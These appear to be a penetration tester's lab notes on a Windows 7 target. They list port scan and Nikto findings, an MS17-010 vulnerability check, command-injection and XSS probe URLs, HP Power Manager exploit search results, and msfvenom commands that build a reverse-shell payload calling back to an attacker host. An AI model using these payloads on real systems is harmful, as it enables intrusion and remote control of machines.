- os
OS: Windows 7 Ultimate N 7600
OS version: '6.1'
OS release: ''
OS build: '7600'
Native OS: Windows 7 Ultimate N 7600
Native LAN manager: Windows 7 Ultimate N 6.1

- ports
- 80
    HTTPServer[GoAhead-Webs]
    HP Power Manager
    Cyclade
    + /cgi-bin/dose.pl?daily&somefile.txt&|ls|: DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter. See: OSVDB-2799
    + /cgi-bin-sdb/dose.pl?daily&somefile.txt&|ls|: DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter. See: OSVDB-2799
    + /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>: Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). See: OSVDB-3280
    + /docs/<script>alert('Vulnerable');</script>: Nokia Electronic Documentation is vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0801

- 139 
    [V] Trying to get NetBIOS names information, running command: nmblookup -s /tmp/tmpnxrjto4_ -A 192.168.197.45
    [92m[+] Got domain/workgroup name: WORKGROUP[0m
    [92m[+] Full NetBIOS names information:
    - KEVIN           <00> -         B <ACTIVE>  Workstation Service
    - WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    - WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
    - KEVIN           <20> -         B <ACTIVE>  File Server Service
    - WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    - ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    - MAC Address = 00-50-56-AB-F9-35[0m

- 445
[V] Trying to get NetBIOS names information, running command: nmblookup -s /tmp/tmpnxrjto4_ -A 192.168.197.45
  SMB 1.0: true
  SMB 2.02: true
  SMB 2.1: true 

  smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|         

- 3389 
    ms-wbt-server

- 3573
    tag-ups-1

- udp 137
    netbios-ns

1. hp power manager     no rce
2. cyclade              no rce
3. dailyDose            rce 但是利用不成功  http://192.168.197.45/cgi-bin/dose.pl?daily&somefile.txt&|whoami|
4. goahead web server   no rce

ss hp power manager
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                    |  Path
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure                                                | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit)                                           | windows/remote/16785.rb
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow                        | windows/remote/10099.py
HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit)                                                       | cgi/remote/18015.rb
---------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.45.189 LPORT=4444 -e x86/alpha_mixed -f c

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.189 LPORT=4444 EXITFUNC=thread -b "\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5" -e  x86/alpha_mixed -f python